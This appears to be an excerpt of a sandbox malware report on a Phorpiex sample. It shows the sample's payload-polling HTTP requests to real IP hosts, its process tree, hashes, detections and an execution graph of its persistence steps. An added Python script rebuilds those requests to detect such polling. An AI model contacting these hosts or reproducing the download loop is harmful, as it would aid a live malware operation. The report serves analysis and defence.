                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                             Session ID:58
                                             Source:192.168.2.4:49829
                                             Destination:185.215.113.66:80
                                             PID:6768
                                             Process:C:\Windows\sysmablsvr.exe
                                             Timestamp:Sep 17, 2024 23:12:53.434623957 CEST  Bytes transferred:166  Direction:OUT
                                             GET /2 HTTP/1.1
                                             User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                             Host: 185.215.113.66
                                             Timestamp:Sep 17, 2024 23:12:54.150146008 CEST  Bytes transferred:728  Direction:IN
                                             HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:54 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                             Session ID:59
                                             Source:192.168.2.4:49831
                                             Destination:185.215.113.66:80
                                             PID:6768
                                             Process:C:\Windows\sysmablsvr.exe
                                             Timestamp:Sep 17, 2024 23:12:56.183052063 CEST  Bytes transferred:166  Direction:OUT
                                             GET /3 HTTP/1.1
                                             User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                             Host: 185.215.113.66
                                             Timestamp:Sep 17, 2024 23:12:56.870342970 CEST  Bytes transferred:728  Direction:IN
                                             HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:56 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                             Session ID:60
                                             Source:192.168.2.4:49832
                                             Destination:185.215.113.66:80
                                             PID:6768
                                             Process:C:\Windows\sysmablsvr.exe
                                             Timestamp:Sep 17, 2024 23:12:58.903496981 CEST  Bytes transferred:166  Direction:OUT
                                             GET /4 HTTP/1.1
                                             User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                             Host: 185.215.113.66
                                             Timestamp:Sep 17, 2024 23:12:59.606447935 CEST  Bytes transferred:728  Direction:IN
                                             HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:12:59 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                             Session ID:61
                                             Source:192.168.2.4:49834
                                             Destination:185.215.113.66:80
                                             PID:6768
                                             Process:C:\Windows\sysmablsvr.exe
                                             Timestamp:Sep 17, 2024 23:13:01.637963057 CEST  Bytes transferred:166  Direction:OUT
                                             GET /5 HTTP/1.1
                                             User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                             Host: 185.215.113.66
                                             Timestamp:Sep 17, 2024 23:13:02.354104042 CEST  Bytes transferred:728  Direction:IN
                                             HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:13:02 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                             Session ID:62
                                             Source:192.168.2.4:49836
                                             Destination:185.215.113.66:80
                                             PID:6768
                                             Process:C:\Windows\sysmablsvr.exe
                                             Timestamp:Sep 17, 2024 23:13:04.385543108 CEST  Bytes transferred:166  Direction:OUT
                                             GET /6 HTTP/1.1
                                             User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                             Host: 185.215.113.66
                                             Timestamp:Sep 17, 2024 23:13:05.072268963 CEST  Bytes transferred:728  Direction:IN
                                             HTTP/1.1 404 Not Found
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 17 Sep 2024 21:13:04 GMT
                                            Content-Type: text/html
                                            Content-Length: 564
                                            Connection: keep-alive
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                             Session ID:63
                                             Source:192.168.2.4:49837
                                             Destination:77.91.77.92:80
                                             PID:6768
                                             Process:C:\Windows\sysmablsvr.exe
                                             Timestamp:Sep 17, 2024 23:13:08.134874105 CEST  Bytes transferred:163  Direction:OUT
                                             GET /1 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92


                                             Session ID:64
                                             Source:192.168.2.4:49839
                                             Destination:77.91.77.92:80
                                             PID:6768
                                             Process:C:\Windows\sysmablsvr.exe
                                             Timestamp:Sep 17, 2024 23:13:12.011240005 CEST  Bytes transferred:163  Direction:OUT
                                             GET /2 HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                            Host: 77.91.77.92
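The sessions above are the dropped copy's download loop as the sandbox captured it: GET /1 through /6 against hosts addressed by literal IP, one fixed Chrome User-Agent with no other browser headers, and either an nginx 404 or no answer at all coming back. The script below is an added example, not code from the Joe Sandbox report or from the sample; its SAMPLE_SESSIONS list is copied from sessions 56 to 64 above, and the tells it scores (numeric path, literal-IP Host, thin browser-like headers, 404-only answers) and the min_paths threshold are the editor's assumptions, not values taken from the report.

```python
"""Spot payload-polling loops in captured HTTP sessions.

Added example; this is not code from the Joe Sandbox report. SAMPLE_SESSIONS
is copied from the report's sessions 56 to 64 (PID 6768,
C:\\Windows\\sysmablsvr.exe); the tells and the min_paths threshold in
find_polling() are the editor's assumptions, not values from the report.
"""
import ipaddress
import re
from collections import defaultdict

# The one User-Agent that every request in sessions 56 to 64 carries.
UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36")


def build_request(path, host):
    """Rebuild a request as captured: request line, User-Agent and Host only."""
    return f"GET {path} HTTP/1.1\r\nUser-Agent: {UA}\r\nHost: {host}\r\n\r\n"


# (session id, destination IP, raw request, response status line or None)
SAMPLE_SESSIONS = [
    (56, "91.202.233.141", build_request("/6", "91.202.233.141"), "HTTP/1.1 404 Not Found"),
    (57, "185.215.113.66", build_request("/1", "185.215.113.66"), "HTTP/1.1 404 Not Found"),
    (58, "185.215.113.66", build_request("/2", "185.215.113.66"), "HTTP/1.1 404 Not Found"),
    (59, "185.215.113.66", build_request("/3", "185.215.113.66"), "HTTP/1.1 404 Not Found"),
    (60, "185.215.113.66", build_request("/4", "185.215.113.66"), "HTTP/1.1 404 Not Found"),
    (61, "185.215.113.66", build_request("/5", "185.215.113.66"), "HTTP/1.1 404 Not Found"),
    (62, "185.215.113.66", build_request("/6", "185.215.113.66"), "HTTP/1.1 404 Not Found"),
    (63, "77.91.77.92", build_request("/1", "77.91.77.92"), None),  # no reply captured
    (64, "77.91.77.92", build_request("/2", "77.91.77.92"), None),  # no reply captured
]


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, path and a lower-cased header dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def is_bare_ip(host):
    """True when the Host header is a literal IP rather than a name."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def status_code(status_line):
    """Numeric status from a status line; None when nothing came back."""
    if not status_line:
        return None
    return int(status_line.split(" ", 2)[1])


def find_polling(sessions, min_paths=3):
    """Group requests by destination and flag the ones that look like a
    download loop: GET on a purely numeric path, a literal-IP Host header,
    a browser User-Agent with no other browser headers, and only 404s or
    silence coming back. A destination is flagged when every one of its
    requests shows those header tells and at least min_paths distinct
    numeric paths were tried. Thresholds are assumptions, not report values.
    """
    per_dst = defaultdict(lambda: {"paths": [], "codes": [], "tells": True})
    for _sid, dst, raw, status in sessions:
        req = parse_request(raw)
        hdr = req["headers"]
        numeric = re.fullmatch(r"/\d+", req["path"]) is not None
        thin = set(hdr) <= {"user-agent", "host"} and "Mozilla/" in hdr.get("user-agent", "")
        rec = per_dst[dst]
        rec["paths"].append(req["path"])
        rec["codes"].append(status_code(status))
        rec["tells"] = (rec["tells"] and req["method"] == "GET" and numeric
                        and thin and is_bare_ip(hdr.get("host", "")))
    flagged = {}
    for dst, rec in per_dst.items():
        if not rec["tells"]:
            continue
        distinct = sorted(set(rec["paths"]), key=lambda p: int(p[1:]))
        if len(distinct) < min_paths:
            continue
        flagged[dst] = {
            "paths": distinct,
            "requests": len(rec["paths"]),
            "no_payload": all(c in (None, 404) for c in rec["codes"]),
        }
    return flagged


if __name__ == "__main__":
    for dst, info in find_polling(SAMPLE_SESSIONS).items():
        print(dst, info)
```

With the default threshold only 185.215.113.66 is flagged (six distinct paths, every answer a 404); 91.202.233.141 and 77.91.77.92 fall below it because this section of the report shows only one and two of their requests. Lower min_paths to 1 and all three hosts come out, which is the right setting when the sandbox run is short or the capture is cut, at the cost of more false positives from ordinary numeric-path APIs on literal-IP hosts.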



                                            Target ID:0
                                            Start time:17:09:07
                                            Start date:17/09/2024
                                            Path:C:\Users\user\Desktop\file.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\file.exe"
                                            Imagebase:0x400000
                                            File size:90'112 bytes
                                            MD5 hash:ABABCA6D12D96E8DD2F1D7114B406FAE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000000.1784055994.0000000000410000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000000.00000003.1805000272.0000000000547000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:17:09:09
                                            Start date:17/09/2024
                                            Path:C:\Windows\sysmablsvr.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\sysmablsvr.exe
                                            Imagebase:0x400000
                                            File size:90'112 bytes
                                            MD5 hash:ABABCA6D12D96E8DD2F1D7114B406FAE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000000.1804968685.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Windows\sysmablsvr.exe, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 84%, ReversingLabs
                                            Reputation:low
                                            Has exited:false

                                            Target ID:2
                                            Start time:17:09:19
                                            Start date:17/09/2024
                                            Path:C:\Windows\sysmablsvr.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\sysmablsvr.exe"
                                            Imagebase:0x400000
                                            File size:90'112 bytes
                                            MD5 hash:ABABCA6D12D96E8DD2F1D7114B406FAE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000000.1909749196.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:6
                                            Start time:17:10:03
                                            Start date:17/09/2024
                                            Path:C:\Users\user\AppData\Local\Temp\158752420.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\158752420.exe
                                            Imagebase:0x6e0000
                                            File size:12'288 bytes
                                            MD5 hash:8242045FF6B7BED00C8A94C77193F2DE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:7
                                            Start time:17:10:12
                                            Start date:17/09/2024
                                            Path:C:\Users\user\AppData\Local\Temp\524024912.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\524024912.exe
                                            Imagebase:0x220000
                                            File size:7'680 bytes
                                            MD5 hash:AC0A159A6C219E2CEA55DCC77AB6E337
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 75%, ReversingLabs
                                            Reputation:low
                                            Has exited:true

                                            Target ID:9
                                            Start time:17:11:19
                                            Start date:17/09/2024
                                            Path:C:\Users\user\AppData\Local\Temp\259428477.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\259428477.exe
                                            Imagebase:0xa30000
                                            File size:12'288 bytes
                                            MD5 hash:8242045FF6B7BED00C8A94C77193F2DE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true

                                            Target ID:10
                                            Start time:17:12:30
                                            Start date:17/09/2024
                                            Path:C:\Users\user\AppData\Local\Temp\2958729589.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\2958729589.exe
                                            Imagebase:0x3d0000
                                            File size:12'288 bytes
                                            MD5 hash:8242045FF6B7BED00C8A94C77193F2DE
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low
                                            Has exited:true


                                              Execution Graph

                                              Execution Coverage:0.9%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:17.1%
                                              Total number of Nodes:1477
                                              Total number of Limit Nodes:8
                                               execution_graph: rendered figure; the page carries only its serialized node and edge list, truncated. Readable entry chain, node address followed by the API calls the graph attributes to it:
                                               0x407500: Sleep, CreateMutexA, GetLastError
                                                 -> 0x407536: ExitProcess (exit branch after the mutex check)
                                                 -> 0x40753e: 6 API calls
                                                    -> 0x4075e3 -> 0x40ecc0: GetLocaleInfoA, strcmp -> 0x4075e8
                                                       -> 0x4075f0: ExitProcess
                                                       -> 0x4075f8: ExpandEnvironmentStringsW, wsprintfW, CopyFileW
                                                          -> 0x40764c: SetFileAttributesW, RegOpenKeyExW -> 0x40767d: wcslen, RegSetValueExW -> 0x4076b2: RegCloseKey -> 0x40ef10: memset, memset, CreateProcessW -> 0x40ef81: ShellExecuteW / 0x40ef72: Sleep -> 0x4076cb -> 0x4076d6: ExitProcess
                                                          -> 0x4076de: Sleep, wsprintfW, CopyFileW -> 0x407726: SetFileAttributesW, RegOpenKeyExW -> 0x407757: wcslen, RegSetValueExW -> 0x40778c: RegCloseKey -> 0x40ef10 (as above)
                                                          -> 0x4077b8: Sleep, ExpandEnvironmentStringsW, wsprintfW, CopyFileW -> 0x407817: SetFileAttributesW, RegOpenKeyExW -> 0x407848: wcslen, RegSetValueExW -> 0x40787d: RegCloseKey -> 0x40ef10 (as above)
                                                    -> 0x4078a9: Sleep, RegOpenKeyExW, then a run of RegOpenKeyExW / RegSetValueExA / RegCloseKey / RegCreateKeyExW nodes (0x4078d6, 0x407902, 0x407924, 0x407950, 0x407972, 0x40799e, 0x4079c0, 0x4079ec, 0x407a0e, 0x407a3f, 0x407a61, 0x407a96, 0x407ab8, 0x407ae4, 0x407b06, 0x407b37, 0x407b59, 0x407b8e, 0x407bb0, 0x407be5, 0x407c07, 0x407c33, 0x407c55, 0x407c81, 0x407ca3), 0x407ccf: RegOpenKeyExA -> 0x407cf5 (8 API calls), 0x407ddb: RegOpenKeyExA -> 0x407e01 (8 API calls), 0x407ee7: Sleep -> 0x40cd60 -> 0x40cd30
                                               Later nodes on the same graph: 0x407f02 (9 API calls) -> 0x405b60: InitializeCriticalSection, CreateFileW -> 0x405b98: CreateFileMappingW -> 0x405bb9: MapViewOfFile -> 0x405bd8: GetFileSize; 0x406b50: Sleep, GetModuleFileNameW; 0x40dbd0: CoInitializeEx -> 0x40dca0: socket, 0x40b010: htons; 0x406f70: CoInitializeEx, SysAllocString; 0x407fb7: CreateEventA; 0x40b850: InitializeCriticalSection -> 0x40b899: CreateFileW -> 0x40b8c0: CreateFileMappingW -> 0x40b8e1: MapViewOfFile -> 0x40b8fc: GetFileSize; 0x40da30: NtQuerySystemTime, RtlTimeToSecondsSince1980; 0x40d75b: CreateThread -> 0x40d7a2: GetCurrentProcess, GetCurrentProcess, DuplicateHandle; 0x40d860: GetCurrentThread, GetThreadPriority, GetCurrentThread, SetThreadPriority; 0x40b0f0: EnterCriticalSection.
